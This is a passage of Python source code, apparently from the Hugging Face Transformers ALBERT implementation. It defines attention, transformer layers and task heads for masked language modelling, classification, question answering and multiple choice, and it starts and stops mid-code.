nn.Dropout(config.attention_probs_dropout_prob) self.output_dropout = nn.Dropout(config.hidden_dropout_prob) self.dense = nn.Linear(config.hidden_size, config.hidden_size) self.LayerNorm = nn.LayerNorm(config.hidden_size, eps=config.layer_norm_eps) self.pruned_heads = set() self.position_embedding_type = getattr(config, "position_embedding_type", "absolute") if self.position_embedding_type == "relative_key" or self.position_embedding_type == "relative_key_query": self.max_position_embeddings = config.max_position_embeddings self.distance_embedding = nn.Embedding(2 * config.max_position_embeddings - 1, self.attention_head_size) # Copied from transformers.models.bert.modeling_bert.BertSelfAttention.transpose_for_scores def transpose_for_scores(self, x): new_x_shape = x.size()[:-1] + (self.num_attention_heads, self.attention_head_size) x = x.view(*new_x_shape) return x.permute(0, 2, 1, 3) def prune_heads(self, heads): if len(heads) == 0: return heads, index = find_pruneable_heads_and_indices( heads, self.num_attention_heads, self.attention_head_size, self.pruned_heads ) # Prune linear layers self.query = prune_linear_layer(self.query, index) self.key = prune_linear_layer(self.key, index) self.value = prune_linear_layer(self.value, index) self.dense = prune_linear_layer(self.dense, index, dim=1) # Update hyper params and store pruned heads self.num_attention_heads = self.num_attention_heads - len(heads) self.all_head_size = self.attention_head_size * self.num_attention_heads self.pruned_heads = self.pruned_heads.union(heads) def forward(self, hidden_states, attention_mask=None, head_mask=None, output_attentions=False): mixed_query_layer = self.query(hidden_states) mixed_key_layer = self.key(hidden_states) mixed_value_layer = self.value(hidden_states) query_layer = self.transpose_for_scores(mixed_query_layer) key_layer = self.transpose_for_scores(mixed_key_layer) value_layer = self.transpose_for_scores(mixed_value_layer) # Take the dot product between "query" and "key" to get the raw attention scores. attention_scores = torch.matmul(query_layer, key_layer.transpose(-1, -2)) attention_scores = attention_scores / math.sqrt(self.attention_head_size) if attention_mask is not None: # Apply the attention mask is (precomputed for all layers in BertModel forward() function) attention_scores = attention_scores + attention_mask if self.position_embedding_type == "relative_key" or self.position_embedding_type == "relative_key_query": seq_length = hidden_states.size()[1] position_ids_l = torch.arange(seq_length, dtype=torch.long, device=hidden_states.device).view(-1, 1) position_ids_r = torch.arange(seq_length, dtype=torch.long, device=hidden_states.device).view(1, -1) distance = position_ids_l - position_ids_r positional_embedding = self.distance_embedding(distance + self.max_position_embeddings - 1) positional_embedding = positional_embedding.to(dtype=query_layer.dtype) # fp16 compatibility if self.position_embedding_type == "relative_key": relative_position_scores = torch.einsum("bhld,lrd->bhlr", query_layer, positional_embedding) attention_scores = attention_scores + relative_position_scores elif self.position_embedding_type == "relative_key_query": relative_position_scores_query = torch.einsum("bhld,lrd->bhlr", query_layer, positional_embedding) relative_position_scores_key = torch.einsum("bhrd,lrd->bhlr", key_layer, positional_embedding) attention_scores = attention_scores + relative_position_scores_query + relative_position_scores_key # Normalize the attention scores to probabilities. attention_probs = nn.Softmax(dim=-1)(attention_scores) # This is actually dropping out entire tokens to attend to, which might # seem a bit unusual, but is taken from the original Transformer paper. attention_probs = self.attention_dropout(attention_probs) # Mask heads if we want to if head_mask is not None: attention_probs = attention_probs * head_mask context_layer = torch.matmul(attention_probs, value_layer) context_layer = context_layer.transpose(2, 1).flatten(2) projected_context_layer = self.dense(context_layer) projected_context_layer_dropout = self.output_dropout(projected_context_layer) layernormed_context_layer = self.LayerNorm(hidden_states + projected_context_layer_dropout) return (layernormed_context_layer, attention_probs) if output_attentions else (layernormed_context_layer,) class AlbertLayer(nn.Module): def __init__(self, config): super().__init__() self.config = config self.chunk_size_feed_forward = config.chunk_size_feed_forward self.seq_len_dim = 1 self.full_layer_layer_norm = nn.LayerNorm(config.hidden_size, eps=config.layer_norm_eps) self.attention = AlbertAttention(config) self.ffn = nn.Linear(config.hidden_size, config.intermediate_size) self.ffn_output = nn.Linear(config.intermediate_size, config.hidden_size) self.activation = ACT2FN[config.hidden_act] self.dropout = nn.Dropout(config.hidden_dropout_prob) def forward( self, hidden_states, attention_mask=None, head_mask=None, output_attentions=False, output_hidden_states=False ): attention_output = self.attention(hidden_states, attention_mask, head_mask, output_attentions) ffn_output = apply_chunking_to_forward( self.ff_chunk, self.chunk_size_feed_forward, self.seq_len_dim, attention_output[0], ) hidden_states = self.full_layer_layer_norm(ffn_output + attention_output[0]) return (hidden_states,) + attention_output[1:] # add attentions if we output them def ff_chunk(self, attention_output): ffn_output = self.ffn(attention_output) ffn_output = self.activation(ffn_output) ffn_output = self.ffn_output(ffn_output) return ffn_output class AlbertLayerGroup(nn.Module): def __init__(self, config): super().__init__() self.albert_layers = nn.ModuleList([AlbertLayer(config) for _ in range(config.inner_group_num)]) def forward( self, hidden_states, attention_mask=None, head_mask=None, output_attentions=False, output_hidden_states=False ): layer_hidden_states = () layer_attentions = () for layer_index, albert_layer in enumerate(self.albert_layers): layer_output = albert_layer(hidden_states, attention_mask, head_mask[layer_index], output_attentions) hidden_states = layer_output[0] if output_attentions: layer_attentions = layer_attentions + (layer_output[1],) if output_hidden_states: layer_hidden_states = layer_hidden_states + (hidden_states,) outputs = (hidden_states,) if output_hidden_states: outputs = outputs + (layer_hidden_states,) if output_attentions: outputs = outputs + (layer_attentions,) return outputs # last-layer hidden state, (layer hidden states), (layer attentions) class AlbertTransformer(nn.Module): def __init__(self, config): super().__init__() self.config = config self.embedding_hidden_mapping_in = nn.Linear(config.embedding_size, config.hidden_size) self.albert_layer_groups = nn.ModuleList([AlbertLayerGroup(config) for _ in range(config.num_hidden_groups)]) def forward( self, hidden_states, attention_mask=None, head_mask=None, output_attentions=False, output_hidden_states=False, return_dict=True, ): hidden_states = self.embedding_hidden_mapping_in(hidden_states) all_hidden_states = (hidden_states,) if output_hidden_states else None all_attentions = () if output_attentions else None head_mask = [None] * self.config.num_hidden_layers if head_mask is None else head_mask for i in range(self.config.num_hidden_layers): # Number of layers in a hidden group layers_per_group = int(self.config.num_hidden_layers / self.config.num_hidden_groups) # Index of the hidden group group_idx = int(i / (self.config.num_hidden_layers / self.config.num_hidden_groups)) layer_group_output = self.albert_layer_groups[group_idx]( hidden_states, attention_mask, head_mask[group_idx * layers_per_group : (group_idx + 1) * layers_per_group], output_attentions, output_hidden_states, ) hidden_states = layer_group_output[0] if output_attentions: all_attentions = all_attentions + layer_group_output[-1] if output_hidden_states: all_hidden_states = all_hidden_states + (hidden_states,) if not return_dict: return tuple(v for v in [hidden_states, all_hidden_states, all_attentions] if v is not None) return BaseModelOutput( last_hidden_state=hidden_states, hidden_states=all_hidden_states, attentions=all_attentions ) class AlbertPreTrainedModel(PreTrainedModel): """ An abstract class to handle weights initialization and a simple interface for downloading and loading pretrained models. """ config_class = AlbertConfig load_tf_weights = load_tf_weights_in_albert base_model_prefix = "albert" _keys_to_ignore_on_load_missing = [r"position_ids"] def _init_weights(self, module): """Initialize the weights.""" if isinstance(module, nn.Linear): # Slightly different from the TF version which uses truncated_normal for initialization # cf https://github.com/pytorch/pytorch/pull/5617 module.weight.data.normal_(mean=0.0, std=self.config.initializer_range) if module.bias is not None: module.bias.data.zero_() elif isinstance(module, nn.Embedding): module.weight.data.normal_(mean=0.0, std=self.config.initializer_range) if module.padding_idx is not None: module.weight.data[module.padding_idx].zero_() elif isinstance(module, nn.LayerNorm): module.bias.data.zero_() module.weight.data.fill_(1.0) @dataclass class AlbertForPreTrainingOutput(ModelOutput): """ Output type of :class:`~transformers.AlbertForPreTraining`. Args: loss (`optional`, returned when ``labels`` is provided, ``torch.FloatTensor`` of shape :obj:`(1,)`): Total loss as the sum of the masked language modeling loss and the next sequence prediction (classification) loss. prediction_logits (:obj:`torch.FloatTensor` of shape :obj:`(batch_size, sequence_length, config.vocab_size)`): Prediction scores of the language modeling head (scores for each vocabulary token before SoftMax). sop_logits (:obj:`torch.FloatTensor` of shape :obj:`(batch_size, 2)`): Prediction scores of the next sequence prediction (classification) head (scores of True/False continuation before SoftMax). hidden_states (:obj:`tuple(torch.FloatTensor)`, `optional`, returned when ``output_hidden_states=True`` is passed or when ``config.output_hidden_states=True``): Tuple of :obj:`torch.FloatTensor` (one for the output of the embeddings + one for the output of each layer) of shape :obj:`(batch_size, sequence_length, hidden_size)`. Hidden-states of the model at the output of each layer plus the initial embedding outputs. attentions (:obj:`tuple(torch.FloatTensor)`, `optional`, returned when ``output_attentions=True`` is passed or when ``config.output_attentions=True``): Tuple of :obj:`torch.FloatTensor` (one for each layer) of shape :obj:`(batch_size, num_heads, sequence_length, sequence_length)`. Attentions weights after the attention softmax, used to compute the weighted average in the self-attention heads. """ loss: Optional[torch.FloatTensor] = None prediction_logits: torch.FloatTensor = None sop_logits: torch.FloatTensor = None hidden_states: Optional[Tuple[torch.FloatTensor]] = None attentions: Optional[Tuple[torch.FloatTensor]] = None ALBERT_START_DOCSTRING = r""" This model inherits from :class:`~transformers.PreTrainedModel`. Check the superclass documentation for the generic methods the library implements for all its model (such as downloading or saving, resizing the input embeddings, pruning heads etc.) This model is also a PyTorch `torch.nn.Module <https://pytorch.org/docs/stable/nn.html#torch.nn.Module>`__ subclass. Use it as a regular PyTorch Module and refer to the PyTorch documentation for all matter related to general usage and behavior. Args: config (:class:`~transformers.AlbertConfig`): Model configuration class with all the parameters of the model. Initializing with a config file does not load the weights associated with the model, only the configuration. Check out the :meth:`~transformers.PreTrainedModel.from_pretrained` method to load the model weights. """ ALBERT_INPUTS_DOCSTRING = r""" Args: input_ids (:obj:`torch.LongTensor` of shape :obj:`({0})`): Indices of input sequence tokens in the vocabulary. Indices can be obtained using :class:`~transformers.AlbertTokenizer`. See :meth:`transformers.PreTrainedTokenizer.__call__` and :meth:`transformers.PreTrainedTokenizer.encode` for details. `What are input IDs? <../glossary.html#input-ids>`__ attention_mask (:obj:`torch.FloatTensor` of shape :obj:`({0})`, `optional`): Mask to avoid performing attention on padding token indices. Mask values selected in ``[0, 1]``: - 1 for tokens that are **not masked**, - 0 for tokens that are **masked**. `What are attention masks? <../glossary.html#attention-mask>`__ token_type_ids (:obj:`torch.LongTensor` of shape :obj:`({0})`, `optional`): Segment token indices to indicate first and second portions of the inputs. Indices are selected in ``[0, 1]``: - 0 corresponds to a `sentence A` token, - 1 corresponds to a `sentence B` token. `What are token type IDs? <../glossary.html#token-type-ids>`_ position_ids (:obj:`torch.LongTensor` of shape :obj:`({0})`, `optional`): Indices of positions of each input sequence tokens in the position embeddings. Selected in the range ``[0, config.max_position_embeddings - 1]``. `What are position IDs? <../glossary.html#position-ids>`_ head_mask (:obj:`torch.FloatTensor` of shape :obj:`(num_heads,)` or :obj:`(num_layers, num_heads)`, `optional`): Mask to nullify selected heads of the self-attention modules. Mask values selected in ``[0, 1]``: - 1 indicates the head is **not masked**, - 0 indicates the head is **masked**. inputs_embeds (:obj:`torch.FloatTensor` of shape :obj:`({0}, hidden_size)`, `optional`): Optionally, instead of passing :obj:`input_ids` you can choose to directly pass an embedded representation. This is useful if you want more control over how to convert :obj:`input_ids` indices into associated vectors than the model's internal embedding lookup matrix. output_attentions (:obj:`bool`, `optional`): Whether or not to return the attentions tensors of all attention layers. See ``attentions`` under returned tensors for more detail. output_hidden_states (:obj:`bool`, `optional`): Whether or not to return the hidden states of all layers. See ``hidden_states`` under returned tensors for more detail. return_dict (:obj:`bool`, `optional`): Whether or not to return a :class:`~transformers.file_utils.ModelOutput` instead of a plain tuple. """ @add_start_docstrings( "The bare ALBERT Model transformer outputting raw hidden-states without any specific head on top.", ALBERT_START_DOCSTRING, ) class AlbertModel(AlbertPreTrainedModel): config_class = AlbertConfig base_model_prefix = "albert" def __init__(self, config, add_pooling_layer=True): super().__init__(config) self.config = config self.embeddings = AlbertEmbeddings(config) self.encoder = AlbertTransformer(config) if add_pooling_layer: self.pooler = nn.Linear(config.hidden_size, config.hidden_size) self.pooler_activation = nn.Tanh() else: self.pooler = None self.pooler_activation = None # Initialize weights and apply final processing self.post_init() def get_input_embeddings(self): return self.embeddings.word_embeddings def set_input_embeddings(self, value): self.embeddings.word_embeddings = value def _prune_heads(self, heads_to_prune): """ Prunes heads of the model. heads_to_prune: dict of {layer_num: list of heads to prune in this layer} ALBERT has a different architecture in that its layers are shared across groups, which then has inner groups. If an ALBERT model has 12 hidden layers and 2 hidden groups, with two inner groups, there is a total of 4 different layers. These layers are flattened: the indices [0,1] correspond to the two inner groups of the first hidden layer, while [2,3] correspond to the two inner groups of the second hidden layer. Any layer with in index other than [0,1,2,3] will result in an error. See base class PreTrainedModel for more information about head pruning """ for layer, heads in heads_to_prune.items(): group_idx = int(layer / self.config.inner_group_num) inner_group_idx = int(layer - group_idx * self.config.inner_group_num) self.encoder.albert_layer_groups[group_idx].albert_layers[inner_group_idx].attention.prune_heads(heads) @add_start_docstrings_to_model_forward(ALBERT_INPUTS_DOCSTRING.format("batch_size, sequence_length")) @add_code_sample_docstrings( processor_class=_TOKENIZER_FOR_DOC, checkpoint=_CHECKPOINT_FOR_DOC, output_type=BaseModelOutputWithPooling, config_class=_CONFIG_FOR_DOC, ) def forward( self, input_ids=None, attention_mask=None, token_type_ids=None, position_ids=None, head_mask=None, inputs_embeds=None, output_attentions=None, output_hidden_states=None, return_dict=None, ): output_attentions = output_attentions if output_attentions is not None else self.config.output_attentions output_hidden_states = ( output_hidden_states if output_hidden_states is not None else self.config.output_hidden_states ) return_dict = return_dict if return_dict is not None else self.config.use_return_dict if input_ids is not None and inputs_embeds is not None: raise ValueError("You cannot specify both input_ids and inputs_embeds at the same time") elif input_ids is not None: input_shape = input_ids.size() elif inputs_embeds is not None: input_shape = inputs_embeds.size()[:-1] else: raise ValueError("You have to specify either input_ids or inputs_embeds") batch_size, seq_length = input_shape device = input_ids.device if input_ids is not None else inputs_embeds.device if attention_mask is None: attention_mask = torch.ones(input_shape, device=device) if token_type_ids is None: if hasattr(self.embeddings, "token_type_ids"): buffered_token_type_ids = self.embeddings.token_type_ids[:, :seq_length] buffered_token_type_ids_expanded = buffered_token_type_ids.expand(batch_size, seq_length) token_type_ids = buffered_token_type_ids_expanded else: token_type_ids = torch.zeros(input_shape, dtype=torch.long, device=device) extended_attention_mask = attention_mask.unsqueeze(1).unsqueeze(2) extended_attention_mask = extended_attention_mask.to(dtype=self.dtype) # fp16 compatibility extended_attention_mask = (1.0 - extended_attention_mask) * -10000.0 head_mask = self.get_head_mask(head_mask, self.config.num_hidden_layers) embedding_output = self.embeddings( input_ids, position_ids=position_ids, token_type_ids=token_type_ids, inputs_embeds=inputs_embeds ) encoder_outputs = self.encoder( embedding_output, extended_attention_mask, head_mask=head_mask, output_attentions=output_attentions, output_hidden_states=output_hidden_states, return_dict=return_dict, ) sequence_output = encoder_outputs[0] pooled_output = self.pooler_activation(self.pooler(sequence_output[:, 0])) if self.pooler is not None else None if not return_dict: return (sequence_output, pooled_output) + encoder_outputs[1:] return BaseModelOutputWithPooling( last_hidden_state=sequence_output, pooler_output=pooled_output, hidden_states=encoder_outputs.hidden_states, attentions=encoder_outputs.attentions, ) @add_start_docstrings( """ Albert Model with two heads on top as done during the pretraining: a `masked language modeling` head and a `sentence order prediction (classification)` head. """, ALBERT_START_DOCSTRING, ) class AlbertForPreTraining(AlbertPreTrainedModel): def __init__(self, config): super().__init__(config) self.albert = AlbertModel(config) self.predictions = AlbertMLMHead(config) self.sop_classifier = AlbertSOPHead(config) # Initialize weights and apply final processing self.post_init() def get_output_embeddings(self): return self.predictions.decoder def set_output_embeddings(self, new_embeddings): self.predictions.decoder = new_embeddings def get_input_embeddings(self): return self.albert.embeddings.word_embeddings @add_start_docstrings_to_model_forward(ALBERT_INPUTS_DOCSTRING.format("batch_size, sequence_length")) @replace_return_docstrings(output_type=AlbertForPreTrainingOutput, config_class=_CONFIG_FOR_DOC) def forward( self, input_ids=None, attention_mask=None, token_type_ids=None, position_ids=None, head_mask=None, inputs_embeds=None, labels=None, sentence_order_label=None, output_attentions=None, output_hidden_states=None, return_dict=None, ): r""" labels (``torch.LongTensor`` of shape ``(batch_size, sequence_length)``, `optional`): Labels for computing the masked language modeling loss. Indices should be in ``[-100, 0, ..., config.vocab_size]`` (see ``input_ids`` docstring) Tokens with indices set to ``-100`` are ignored (masked), the loss is only computed for the tokens with labels in ``[0, ..., config.vocab_size]`` sentence_order_label (``torch.LongTensor`` of shape ``(batch_size,)``, `optional`): Labels for computing the next sequence prediction (classification) loss. Input should be a sequence pair (see :obj:`input_ids` docstring) Indices should be in ``[0, 1]``. ``0`` indicates original order (sequence A, then sequence B), ``1`` indicates switched order (sequence B, then sequence A). Returns: Example:: >>> from transformers import AlbertTokenizer, AlbertForPreTraining >>> import torch >>> tokenizer = AlbertTokenizer.from_pretrained('albert-base-v2') >>> model = AlbertForPreTraining.from_pretrained('albert-base-v2') >>> input_ids = torch.tensor(tokenizer.encode("Hello, my dog is cute", add_special_tokens=True)).unsqueeze(0) # Batch size 1 >>> outputs = model(input_ids) >>> prediction_logits = outputs.prediction_logits >>> sop_logits = outputs.sop_logits """ return_dict = return_dict if return_dict is not None else self.config.use_return_dict outputs = self.albert( input_ids, attention_mask=attention_mask, token_type_ids=token_type_ids, position_ids=position_ids, head_mask=head_mask, inputs_embeds=inputs_embeds, output_attentions=output_attentions, output_hidden_states=output_hidden_states, return_dict=return_dict, ) sequence_output, pooled_output = outputs[:2] prediction_scores = self.predictions(sequence_output) sop_scores = self.sop_classifier(pooled_output) total_loss = None if labels is not None and sentence_order_label is not None: loss_fct = CrossEntropyLoss() masked_lm_loss = loss_fct(prediction_scores.view(-1, self.config.vocab_size), labels.view(-1)) sentence_order_loss = loss_fct(sop_scores.view(-1, 2), sentence_order_label.view(-1)) total_loss = masked_lm_loss + sentence_order_loss if not return_dict: output = (prediction_scores, sop_scores) + outputs[2:] return ((total_loss,) + output) if total_loss is not None else output return AlbertForPreTrainingOutput( loss=total_loss, prediction_logits=prediction_scores, sop_logits=sop_scores, hidden_states=outputs.hidden_states, attentions=outputs.attentions, ) class AlbertMLMHead(nn.Module): def __init__(self, config): super().__init__() self.LayerNorm = nn.LayerNorm(config.embedding_size) self.bias = nn.Parameter(torch.zeros(config.vocab_size)) self.dense = nn.Linear(config.hidden_size, config.embedding_size) self.decoder = nn.Linear(config.embedding_size, config.vocab_size) self.activation = ACT2FN[config.hidden_act] self.decoder.bias = self.bias def forward(self, hidden_states): hidden_states = self.dense(hidden_states) hidden_states = self.activation(hidden_states) hidden_states = self.LayerNorm(hidden_states) hidden_states = self.decoder(hidden_states) prediction_scores = hidden_states return prediction_scores def _tie_weights(self): # To tie those two weights if they get disconnected (on TPU or when the bias is resized) self.bias = self.decoder.bias class AlbertSOPHead(nn.Module): def __init__(self, config): super().__init__() self.dropout = nn.Dropout(config.classifier_dropout_prob) self.classifier = nn.Linear(config.hidden_size, config.num_labels) def forward(self, pooled_output): dropout_pooled_output = self.dropout(pooled_output) logits = self.classifier(dropout_pooled_output) return logits @add_start_docstrings( "Albert Model with a `language modeling` head on top.", ALBERT_START_DOCSTRING, ) class AlbertForMaskedLM(AlbertPreTrainedModel): _keys_to_ignore_on_load_unexpected = [r"pooler"] def __init__(self, config): super().__init__(config) self.albert = AlbertModel(config, add_pooling_layer=False) self.predictions = AlbertMLMHead(config) # Initialize weights and apply final processing self.post_init() def get_output_embeddings(self): return self.predictions.decoder def set_output_embeddings(self, new_embeddings): self.predictions.decoder = new_embeddings def get_input_embeddings(self): return self.albert.embeddings.word_embeddings @add_start_docstrings_to_model_forward(ALBERT_INPUTS_DOCSTRING.format("batch_size, sequence_length")) @add_code_sample_docstrings( processor_class=_TOKENIZER_FOR_DOC, checkpoint=_CHECKPOINT_FOR_DOC, output_type=MaskedLMOutput, config_class=_CONFIG_FOR_DOC, ) def forward( self, input_ids=None, attention_mask=None, token_type_ids=None, position_ids=None, head_mask=None, inputs_embeds=None, labels=None, output_attentions=None, output_hidden_states=None, return_dict=None, ): r""" labels (:obj:`torch.LongTensor` of shape :obj:`(batch_size, sequence_length)`, `optional`): Labels for computing the masked language modeling loss. Indices should be in ``[-100, 0, ..., config.vocab_size]`` (see ``input_ids`` docstring) Tokens with indices set to ``-100`` are ignored (masked), the loss is only computed for the tokens with labels in ``[0, ..., config.vocab_size]`` """ return_dict = return_dict if return_dict is not None else self.config.use_return_dict outputs = self.albert( input_ids=input_ids, attention_mask=attention_mask, token_type_ids=token_type_ids, position_ids=position_ids, head_mask=head_mask, inputs_embeds=inputs_embeds, output_attentions=output_attentions, output_hidden_states=output_hidden_states, return_dict=return_dict, ) sequence_outputs = outputs[0] prediction_scores = self.predictions(sequence_outputs) masked_lm_loss = None if labels is not None: loss_fct = CrossEntropyLoss() masked_lm_loss = loss_fct(prediction_scores.view(-1, self.config.vocab_size), labels.view(-1)) if not return_dict: output = (prediction_scores,) + outputs[2:] return ((masked_lm_loss,) + output) if masked_lm_loss is not None else output return MaskedLMOutput( loss=masked_lm_loss, logits=prediction_scores, hidden_states=outputs.hidden_states, attentions=outputs.attentions, ) @add_start_docstrings( """ Albert Model transformer with a sequence classification/regression head on top (a linear layer on top of the pooled output) e.g. for GLUE tasks. """, ALBERT_START_DOCSTRING, ) class AlbertForSequenceClassification(AlbertPreTrainedModel): def __init__(self, config): super().__init__(config) self.num_labels = config.num_labels self.config = config self.albert = AlbertModel(config) self.dropout = nn.Dropout(config.classifier_dropout_prob) self.classifier = nn.Linear(config.hidden_size, self.config.num_labels) # Initialize weights and apply final processing self.post_init() @add_start_docstrings_to_model_forward(ALBERT_INPUTS_DOCSTRING.format("batch_size, sequence_length")) @add_code_sample_docstrings( processor_class=_TOKENIZER_FOR_DOC, checkpoint=_CHECKPOINT_FOR_DOC, output_type=SequenceClassifierOutput, config_class=_CONFIG_FOR_DOC, ) def forward( self, input_ids=None, attention_mask=None, token_type_ids=None, position_ids=None, head_mask=None, inputs_embeds=None, labels=None, output_attentions=None, output_hidden_states=None, return_dict=None, ): r""" labels (:obj:`torch.LongTensor` of shape :obj:`(batch_size,)`, `optional`): Labels for computing the sequence classification/regression loss. Indices should be in ``[0, ..., config.num_labels - 1]``. If ``config.num_labels == 1`` a regression loss is computed (Mean-Square loss), If ``config.num_labels > 1`` a classification loss is computed (Cross-Entropy). """ return_dict = return_dict if return_dict is not None else self.config.use_return_dict outputs = self.albert( input_ids=input_ids, attention_mask=attention_mask, token_type_ids=token_type_ids, position_ids=position_ids, head_mask=head_mask, inputs_embeds=inputs_embeds, output_attentions=output_attentions, output_hidden_states=output_hidden_states, return_dict=return_dict, ) pooled_output = outputs[1] pooled_output = self.dropout(pooled_output) logits = self.classifier(pooled_output) loss = None if labels is not None: if self.config.problem_type is None: if self.num_labels == 1: self.config.problem_type = "regression" elif self.num_labels > 1 and (labels.dtype == torch.long or labels.dtype == torch.int): self.config.problem_type = "single_label_classification" else: self.config.problem_type = "multi_label_classification" if self.config.problem_type == "regression": loss_fct = MSELoss() if self.num_labels == 1: loss = loss_fct(logits.squeeze(), labels.squeeze()) else: loss = loss_fct(logits, labels) elif self.config.problem_type == "single_label_classification": loss_fct = CrossEntropyLoss() loss = loss_fct(logits.view(-1, self.num_labels), labels.view(-1)) elif self.config.problem_type == "multi_label_classification": loss_fct = BCEWithLogitsLoss() loss = loss_fct(logits, labels) if not return_dict: output = (logits,) + outputs[2:] return ((loss,) + output) if loss is not None else output return SequenceClassifierOutput( loss=loss, logits=logits, hidden_states=outputs.hidden_states, attentions=outputs.attentions, ) @add_start_docstrings( """ Albert Model with a token classification head on top (a linear layer on top of the hidden-states output) e.g. for Named-Entity-Recognition (NER) tasks. """, ALBERT_START_DOCSTRING, ) class AlbertForTokenClassification(AlbertPreTrainedModel): _keys_to_ignore_on_load_unexpected = [r"pooler"] def __init__(self, config): super().__init__(config) self.num_labels = config.num_labels self.albert = AlbertModel(config, add_pooling_layer=False) classifier_dropout_prob = ( config.classifier_dropout_prob if config.classifier_dropout_prob is not None else config.hidden_dropout_prob ) self.dropout = nn.Dropout(classifier_dropout_prob) self.classifier = nn.Linear(config.hidden_size, self.config.num_labels) # Initialize weights and apply final processing self.post_init() @add_start_docstrings_to_model_forward(ALBERT_INPUTS_DOCSTRING.format("batch_size, sequence_length")) @add_code_sample_docstrings( processor_class=_TOKENIZER_FOR_DOC, checkpoint=_CHECKPOINT_FOR_DOC, output_type=TokenClassifierOutput, config_class=_CONFIG_FOR_DOC, ) def forward( self, input_ids=None, attention_mask=None, token_type_ids=None, position_ids=None, head_mask=None, inputs_embeds=None, labels=None, output_attentions=None, output_hidden_states=None, return_dict=None, ): r""" labels (:obj:`torch.LongTensor` of shape :obj:`(batch_size, sequence_length)`, `optional`): Labels for computing the token classification loss. Indices should be in ``[0, ..., config.num_labels - 1]``. """ return_dict = return_dict if return_dict is not None else self.config.use_return_dict outputs = self.albert( input_ids, attention_mask=attention_mask, token_type_ids=token_type_ids, position_ids=position_ids, head_mask=head_mask, inputs_embeds=inputs_embeds, output_attentions=output_attentions, output_hidden_states=output_hidden_states, return_dict=return_dict, ) sequence_output = outputs[0] sequence_output = self.dropout(sequence_output) logits = self.classifier(sequence_output) loss = None if labels is not None: loss_fct = CrossEntropyLoss() # Only keep active parts of the loss if attention_mask is not None: active_loss = attention_mask.view(-1) == 1 active_logits = logits.view(-1, self.num_labels) active_labels = torch.where( active_loss, labels.view(-1), torch.tensor(loss_fct.ignore_index).type_as(labels) ) loss = loss_fct(active_logits, active_labels) else: loss = loss_fct(logits.view(-1, self.num_labels), labels.view(-1)) if not return_dict: output = (logits,) + outputs[2:] return ((loss,) + output) if loss is not None else output return TokenClassifierOutput( loss=loss, logits=logits, hidden_states=outputs.hidden_states, attentions=outputs.attentions, ) @add_start_docstrings( """ Albert Model with a span classification head on top for extractive question-answering tasks like SQuAD (a linear layers on top of the hidden-states output to compute `span start logits` and `span end logits`). """, ALBERT_START_DOCSTRING, ) class AlbertForQuestionAnswering(AlbertPreTrainedModel): _keys_to_ignore_on_load_unexpected = [r"pooler"] def __init__(self, config): super().__init__(config) self.num_labels = config.num_labels self.albert = AlbertModel(config, add_pooling_layer=False) self.qa_outputs = nn.Linear(config.hidden_size, config.num_labels) # Initialize weights and apply final processing self.post_init() @add_start_docstrings_to_model_forward(ALBERT_INPUTS_DOCSTRING.format("batch_size, sequence_length")) @add_code_sample_docstrings( processor_class=_TOKENIZER_FOR_DOC, checkpoint=_CHECKPOINT_FOR_DOC, output_type=QuestionAnsweringModelOutput, config_class=_CONFIG_FOR_DOC, ) def forward( self, input_ids=None, attention_mask=None, token_type_ids=None, position_ids=None, head_mask=None, inputs_embeds=None, start_positions=None, end_positions=None, output_attentions=None, output_hidden_states=None, return_dict=None, ): r""" start_positions (:obj:`torch.LongTensor` of shape :obj:`(batch_size,)`, `optional`): Labels for position (index) of the start of the labelled span for computing the token classification loss. Positions are clamped to the length of the sequence (:obj:`sequence_length`). Position outside of the sequence are not taken into account for computing the loss. end_positions (:obj:`torch.LongTensor` of shape :obj:`(batch_size,)`, `optional`): Labels for position (index) of the end of the labelled span for computing the token classification loss. Positions are clamped to the length of the sequence (:obj:`sequence_length`). Position outside of the sequence are not taken into account for computing the loss. """ return_dict = return_dict if return_dict is not None else self.config.use_return_dict outputs = self.albert( input_ids=input_ids, attention_mask=attention_mask, token_type_ids=token_type_ids, position_ids=position_ids, head_mask=head_mask, inputs_embeds=inputs_embeds, output_attentions=output_attentions, output_hidden_states=output_hidden_states, return_dict=return_dict, ) sequence_output = outputs[0] logits = self.qa_outputs(sequence_output) start_logits, end_logits = logits.split(1, dim=-1) start_logits = start_logits.squeeze(-1).contiguous() end_logits = end_logits.squeeze(-1).contiguous() total_loss = None if start_positions is not None and end_positions is not None: # If we are on multi-GPU, split add a dimension if len(start_positions.size()) > 1: start_positions = start_positions.squeeze(-1) if len(end_positions.size()) > 1: end_positions = end_positions.squeeze(-1) # sometimes the start/end positions are outside our model inputs, we ignore these terms ignored_index = start_logits.size(1) start_positions = start_positions.clamp(0, ignored_index) end_positions = end_positions.clamp(0, ignored_index) loss_fct = CrossEntropyLoss(ignore_index=ignored_index) start_loss = loss_fct(start_logits, start_positions) end_loss = loss_fct(end_logits, end_positions) total_loss = (start_loss + end_loss) / 2 if not return_dict: output = (start_logits, end_logits) + outputs[2:] return ((total_loss,) + output) if total_loss is not None else output return QuestionAnsweringModelOutput( loss=total_loss, start_logits=start_logits, end_logits=end_logits, hidden_states=outputs.hidden_states, attentions=outputs.attentions, ) @add_start_docstrings( """ Albert Model with a multiple choice classification head on top (a linear layer on top of the pooled output and a softmax) e.g. for RocStories/SWAG tasks. """, ALBERT_START_DOCSTRING, ) class AlbertForMultipleChoice(AlbertPreTrainedModel): def __init__(self, config): super().__init__(config) self.albert = AlbertModel(config) self.dropout = nn.Dropout(config.classifier_dropout_prob) self.classifier = nn.Linear(config.hidden_size, 1) # Initialize weights and apply final processing self.post_init() @add_start_docstrings_to_model_forward(ALBERT_INPUTS_DOCSTRING.format("batch_size, num_choices, sequence_length")) @add_code_sample_docstrings( processor_class=_TOKENIZER_FOR_DOC, checkpoint=_CHECKPOINT_FOR_DOC, output_type=MultipleChoiceModelOutput, config_class=_CONFIG_FOR_DOC, ) def forward( self, input_ids=None, attention_mask=None, token_type_ids=None, position_ids=None, head_mask=None, inputs_embeds=None, labels=None, output_attentions=None, output_hidden_states=None, return_dict=None, ): r""" labels (:obj:`torch.LongTensor` of shape :obj:`(batch_size,)`, `optional`): Labels for computing the multiple choice classification loss. Indices should be in ``[0, ..., num_choices-1]`` where `num_choices` is the size of the second dimension of the input tensors. (see `input_ids` above) """ return_dict = return_dict if return_dict is not None else self.config.use_return_dict num_choices = input_ids.shape[1] if input_ids is not None else inputs_embeds.shape[1] input_ids = input_ids.view(-1, input_ids.size(-1)) if input_ids is not None else None attention_mask = attention_mask.view(-1, attention_mask.size(-1)) if attention_mask is not None else None token_type_ids = token_type_ids.view(-1, token_type_ids.size(-1)) if token_type_ids is not None else None position_ids 